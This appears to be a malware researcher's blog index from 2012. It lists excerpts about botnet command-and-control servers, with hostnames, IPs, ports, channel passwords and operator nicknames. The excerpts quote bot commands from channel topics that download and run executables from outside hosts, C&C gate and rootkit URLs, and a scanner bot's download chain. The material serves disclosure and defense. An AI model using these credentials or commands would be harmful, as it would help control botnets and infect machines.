Note: New domains are at the bottom of the post This is the skype “worm” that is in the news right now Articles: http://www.techspot.com/news/50443-dorkbot-worm-spreading-via-skype-installs-nasty-ransomware.html http://news.cnet.com/8301-1009_3-57528353-83/worm-spreading-on-skype-im-installs-ransomware/ http://techcrunch.com/2012/10/08/ransomware-worm-now-spreading-on-skype/ http://www.forbes.com/sites/adriankingsleyhughes/2012/10/08/ransomware-worm-spreading-via-skype/ http://countermeasures.trendmicro.eu/skype-worm-spreading-fast/ Resolved venus.timeinfo.pl to 63.223.107.62, 176.9.192.131, 213.165.71.142, 217.160.108.147, 213.165.71.153, 87.106.98.157, 74.208.112.178 Server: venus.timeinfo.pl Port: 1863 Password: 24r34t SSL is needed to connect, accept the invalid certificate Authhost: bossmanRead more...
b4buj4ym0d3m.nl.ai (Aryan irc botnet hosted by Canada Montreal Ovh Hosting Inc).
Resolved b4buj4ym0d3m.nl.ai to 198.27.119.91 Server: b4buj4ym0d3m.nl.ai Port: 6969 Channel: #Aryan# Channel password: Aryan * Topic for #Aryan# is: @Botkill * Topic for #Aryan# set by God at Mon Oct 08 01:09:13 2012 No weed MOTD for this one. Hosting infos: http://whois.domaintools.com/198.27.119.91
lucasbaby.no-ip.info (Irc botnets hosted by Canada Montreal Ovh Hosting Inc.)
Resolved lucasbaby.no-ip.info to 142.4.203.95 Server: lucasbaby.no-ip.info Port: 6969 Channel: #karmie# Channel password: 1234 Nick: [USA|XP|gjetth] Topic for #karmie# is: @dl 1 hxxp://dl.dropbox.com/u/81040225/raw_out.exe Topic for #karmie# set by God at Sun Oct 07 13:42:09 2012 Opers: [Boss] (Anxiety@HaZe.GoV): Anxiety [Boss] ~#karmie# [Boss] irc.HaZe.GoV :HaZeNet [Boss] idle 12:09:34, signon: Mon Oct 08 00:16:30 [Boss] End of WHOISRead more...
123.gets-it.net (Ganja ircbot hosted by United States St. Louis Hosting Solutions International Inc)
Resolved 123.gets-it.net to 69.64.62.151 Server: 123.gets-it.net Port: 6697 * Current Local Users: 34 Max: 40 * Current Global Users: 34 Max: 40 Channel: #Ganja * Topic for #Ganja is: DO NOT USE THE SPEEDTEST COMMAND! * Topic for #Ganja set by Anxiety at Sat Oct 06 02:54:30 2012 Opers: * [Anxiety] (Anxiety@Test-5D47311C.bchsia.telus.net): Anxiety * [Anxiety]Read more...
50.7.239.180 (Rage bots hosted by Czech Republic Zlin Fdcservers.net)
Server: 50.7.239.180 Port: 7777 Channel: #rage * Topic for #rage is: .b0tk1ller 30 .p2p .rarworm .xpl 75 1 75.x.x.x 3 1 76.x.x.x * Topic for #rage set by cyberthrill at Wed Oct 03 13:55:03 2012 Nick format: L0v3|fQrHrWbarp Opers: * [BGChaser] (Ares@sab-5E6EA00F.telnet.bg): Ares * [BGChaser] @#rinfo @#binfo #rscan @#rage @#bkiller #b * [BGChaser] 50.7.239.180 :ServerRead more...
casinovegas.mobi (voip scanning botnet hosted by United States Missoula Sharktech)
I found this recently and though it was interesting enough to post. It’s a http controlled botnet used to scan for voip servers. Malware actionsTells the C&C server it has installed208.98.52.163/90/getip.php?action=liveRequests an ip segement to scan208.98.52.163/90/getip.php?action=getDownloads and installs python (Needed for the scanner)hxxp://208.98.52.163/90/files/python-2.7.2.msiIP range to be scanned is confirmed208.98.52.163/90/insert.php?action=online&computer=USER-PC&range=95.211.169.45-95.211.199.255Unrar utility is downloadedhxxp://208.98.52.163/90/files/UnRAR.exeScanner is downloadedhxxp://208.98.52.163/90/files/pack.rarThe malwareRead more...
crysis4.net (Andromeda http bot hosted by Ukraine Ukrainian Internet Names Center Ltd)
Resolved crysis4.net to 91.231.84.114 Gate url: http://crysis4.net/knockout/image.php Login url: http://crysis4.net/knockout/index.php Rootkit plugin: http://crysis4.net/test/r.pack Hosting infos: http://whois.domaintools.com/91.231.84.114
tut0r1allsvu.info (ngr botnet hosted by United States Elk Grove Village Foroquimica Sl)
Resolved tut0r1allsvu.info to 75.127.10.3 Server: tut0r1allsvu.info Port: 8059 Password:ocx Channel: ##h4n Channel password: shell3 * Topic for ##h4n is: -up hxxp://www.premiersportsgroup.co/utily.exe 96E0E5E5861397EF644FA006BB888956 | -s * Topic for ##h4n set by Ko0l at Tue Oct 02 05:13:49 2012 Redirecting Colombian bots for pharming * Topic for #CO is: -mdns http://www.ellegadodelleon.com.ar/wp-content/it.txt * Topic for #CO set byRead more...
m74.zapto.org (Irc botnets hosted by United Kingdom Santrex Internet Services)
This has so few bots I normally wouldn’t bother posting it, but I just think it’s funny that after being posted once, they haven’t even added a password. Resolved m74.zapto.org to 67.43.226.29 Server: m74.zapto.org Port: 6667 Current Global Users: 237 Max: 246 Channel: ##A## Bot: Athena Channel: ##I## Bot: Insomnia Channel: #j0r Bot: ngrBot Channel:Read more...
ssl.pxnet.to (Insomnia hosted by Antarctica Voxility S.r.l.)
Resolved to ssl.pxnet.to to 109.163.234.180 Server: ssl.pxnet.to Port: 8888 Current Local Users: 301 Max: 888 Channel: #Frank Opers: [Hitler] (Hitler@Tracert1): Hitler [Hitler] #Frank [Hitler] flow.streamscene.to :! [Hitler] is a Network Administrator [Hitler] is available for help. [Hitler] idle 00:04:44, signon: Sat Sep 22 10:32:40 [Hitler] End of WHOIS list. [Fl00der] (Fl00der@gehaxelt-4FBCF4E0.gigabit.perfect-privacy.com): … [Fl00der] #Frank [Fl00der]Read more...